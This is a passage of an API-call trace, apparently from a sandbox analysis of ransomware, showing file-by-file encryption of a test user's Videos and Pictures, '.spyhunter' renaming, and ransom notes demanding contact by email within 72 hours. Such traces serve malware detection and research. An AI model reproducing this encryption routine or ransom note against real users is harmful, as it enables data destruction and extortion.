0x2c0000 [0147.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.538] GetProcessHeap () returned 0x2c0000 [0147.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef65f8 | out: hHeap=0x2c0000) returned 1 [0147.538] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270edf0 | out: pbBuffer=0x270edf0) returned 1 [0147.538] GetProcessHeap () returned 0x2c0000 [0147.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.538] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ede8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ede8*=0x30) returned 1 [0147.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.539] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned 52 [0147.539] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0147.539] GetProcessHeap () returned 0x2c0000 [0147.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.539] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270edac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270edac*=0x1f8, lpOverlapped=0x0) returned 1 [0147.540] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.540] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x270edac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270edac*=0x1f8, lpOverlapped=0x0) returned 1 [0147.540] GetProcessHeap () returned 0x2c0000 [0147.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.540] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.540] WriteFile (in: hFile=0x178, lpBuffer=0x270edec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270edac, lpOverlapped=0x0 | out: lpBuffer=0x270edec*, lpNumberOfBytesWritten=0x270edac*=0x4, lpOverlapped=0x0) returned 1 [0147.540] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270edac, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270edac*=0x30, lpOverlapped=0x0) returned 1 [0147.540] CloseHandle (hObject=0x178) returned 1 [0147.540] GetProcessHeap () returned 0x2c0000 [0147.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.541] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.spyhunter") returned 62 [0147.541] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini.spyhunter")) returned 1 [0147.542] GetProcessHeap () returned 0x2c0000 [0147.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.542] GetProcessHeap () returned 0x2c0000 [0147.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.542] GetProcessHeap () returned 0x2c0000 [0147.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2c28 | out: hHeap=0x2c0000) returned 1 [0147.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2lq9alknqdsjidvkq\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.636] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.636] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed23*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ee4c, lpOverlapped=0x0 | out: lpBuffer=0x270ed23*, lpNumberOfBytesWritten=0x270ee4c*=0x127, lpOverlapped=0x0) returned 1 [0147.637] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.637] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ee4c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ee4c*=0x2ac, lpOverlapped=0x0) returned 1 [0147.637] CloseHandle (hObject=0xa0) returned 1 [0147.637] GetProcessHeap () returned 0x2c0000 [0147.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5738 | out: hHeap=0x2c0000) returned 1 [0147.637] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ede8 | out: pbBuffer=0x270ede8) returned 1 [0147.638] GetProcessHeap () returned 0x2c0000 [0147.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.638] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ede0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ede0*=0x30) returned 1 [0147.638] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\pJMVe5TY\\bBcgRqgrn3r4.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2lq9alknqdsjidvkq\\pjmve5ty\\bbcgrqgrn3r4.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.638] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\pJMVe5TY\\bBcgRqgrn3r4.mkv") returned 84 [0147.638] StrStrW (lpFirst="bBcgRqgrn3r4.mkv", lpSrch=".txt") returned 0x0 [0147.638] GetProcessHeap () returned 0x2c0000 [0147.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.638] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eda4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270eda4*=0x2800, lpOverlapped=0x0) returned 1 [0147.640] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.640] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eda4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270eda4*=0x2800, lpOverlapped=0x0) returned 1 [0147.640] GetProcessHeap () returned 0x2c0000 [0147.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.640] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.640] WriteFile (in: hFile=0xa0, lpBuffer=0x270ede4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eda4, lpOverlapped=0x0 | out: lpBuffer=0x270ede4*, lpNumberOfBytesWritten=0x270eda4*=0x4, lpOverlapped=0x0) returned 1 [0147.640] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eda4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270eda4*=0x30, lpOverlapped=0x0) returned 1 [0147.640] CloseHandle (hObject=0xa0) returned 1 [0147.682] GetProcessHeap () returned 0x2c0000 [0147.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.682] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\pJMVe5TY\\bBcgRqgrn3r4.mkv.spyhunter") returned 94 [0147.683] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\pJMVe5TY\\bBcgRqgrn3r4.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2lq9alknqdsjidvkq\\pjmve5ty\\bbcgrqgrn3r4.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\pJMVe5TY\\bBcgRqgrn3r4.mkv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2lq9alknqdsjidvkq\\pjmve5ty\\bbcgrqgrn3r4.mkv.spyhunter")) returned 1 [0147.684] GetProcessHeap () returned 0x2c0000 [0147.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.684] GetProcessHeap () returned 0x2c0000 [0147.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.684] GetProcessHeap () returned 0x2c0000 [0147.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3a398 | out: hHeap=0x2c0000) returned 1 [0147.684] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ede8 | out: pbBuffer=0x270ede8) returned 1 [0147.684] GetProcessHeap () returned 0x2c0000 [0147.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.684] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ede0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ede0*=0x30) returned 1 [0147.684] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LshW.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lshw.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.684] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LshW.png") returned 51 [0147.685] StrStrW (lpFirst="LshW.png", lpSrch=".txt") returned 0x0 [0147.685] GetProcessHeap () returned 0x2c0000 [0147.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.685] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eda4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270eda4*=0x2800, lpOverlapped=0x0) returned 1 [0147.686] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.686] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eda4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270eda4*=0x2800, lpOverlapped=0x0) returned 1 [0147.686] GetProcessHeap () returned 0x2c0000 [0147.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.686] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.686] WriteFile (in: hFile=0xa0, lpBuffer=0x270ede4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eda4, lpOverlapped=0x0 | out: lpBuffer=0x270ede4*, lpNumberOfBytesWritten=0x270eda4*=0x4, lpOverlapped=0x0) returned 1 [0147.686] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eda4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270eda4*=0x30, lpOverlapped=0x0) returned 1 [0147.686] CloseHandle (hObject=0xa0) returned 1 [0147.686] GetProcessHeap () returned 0x2c0000 [0147.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.687] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LshW.png.spyhunter") returned 61 [0147.687] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LshW.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lshw.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LshW.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lshw.png.spyhunter")) returned 1 [0147.687] GetProcessHeap () returned 0x2c0000 [0147.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.687] GetProcessHeap () returned 0x2c0000 [0147.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.687] GetProcessHeap () returned 0x2c0000 [0147.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebfbc0 | out: hHeap=0x2c0000) returned 1 [0147.688] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.688] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.688] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed17*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ee40, lpOverlapped=0x0 | out: lpBuffer=0x270ed17*, lpNumberOfBytesWritten=0x270ee40*=0x127, lpOverlapped=0x0) returned 1 [0147.689] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.689] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ee40, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ee40*=0x2ac, lpOverlapped=0x0) returned 1 [0147.689] CloseHandle (hObject=0xa0) returned 1 [0147.689] GetProcessHeap () returned 0x2c0000 [0147.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5658 | out: hHeap=0x2c0000) returned 1 [0147.690] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ede0 | out: pbBuffer=0x270ede0) returned 1 [0147.690] GetProcessHeap () returned 0x2c0000 [0147.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.690] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270edd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270edd8*=0x30) returned 1 [0147.690] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\w42 0XmVq.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\w42 0xmvq.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.690] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\w42 0XmVq.gif") returned 70 [0147.690] StrStrW (lpFirst="w42 0XmVq.gif", lpSrch=".txt") returned 0x0 [0147.690] GetProcessHeap () returned 0x2c0000 [0147.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.690] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed9c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed9c*=0x2800, lpOverlapped=0x0) returned 1 [0147.691] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.691] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed9c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed9c*=0x2800, lpOverlapped=0x0) returned 1 [0147.691] GetProcessHeap () returned 0x2c0000 [0147.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.691] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.692] WriteFile (in: hFile=0xa0, lpBuffer=0x270eddc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed9c, lpOverlapped=0x0 | out: lpBuffer=0x270eddc*, lpNumberOfBytesWritten=0x270ed9c*=0x4, lpOverlapped=0x0) returned 1 [0147.692] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed9c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed9c*=0x30, lpOverlapped=0x0) returned 1 [0147.692] CloseHandle (hObject=0xa0) returned 1 [0147.692] GetProcessHeap () returned 0x2c0000 [0147.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.692] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\w42 0XmVq.gif.spyhunter") returned 80 [0147.692] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\w42 0XmVq.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\w42 0xmvq.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\w42 0XmVq.gif.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\w42 0xmvq.gif.spyhunter")) returned 1 [0147.693] GetProcessHeap () returned 0x2c0000 [0147.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.693] GetProcessHeap () returned 0x2c0000 [0147.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.693] GetProcessHeap () returned 0x2c0000 [0147.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fedfc0 | out: hHeap=0x2c0000) returned 1 [0147.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\tC_4rV4sXdXt I\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\tc_4rv4sxdxt i\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.693] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.693] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed0f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ee38, lpOverlapped=0x0 | out: lpBuffer=0x270ed0f*, lpNumberOfBytesWritten=0x270ee38*=0x127, lpOverlapped=0x0) returned 1 [0147.694] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.694] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ee38, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ee38*=0x2ac, lpOverlapped=0x0) returned 1 [0147.695] CloseHandle (hObject=0xa0) returned 1 [0147.695] GetProcessHeap () returned 0x2c0000 [0147.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46b28 | out: hHeap=0x2c0000) returned 1 [0147.695] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270edd8 | out: pbBuffer=0x270edd8) returned 1 [0147.695] GetProcessHeap () returned 0x2c0000 [0147.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.695] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270edd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270edd0*=0x30) returned 1 [0147.695] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\tC_4rV4sXdXt I\\Vx-c7cHT9n40cs.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\tc_4rv4sxdxt i\\vx-c7cht9n40cs.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.695] lstrlenW 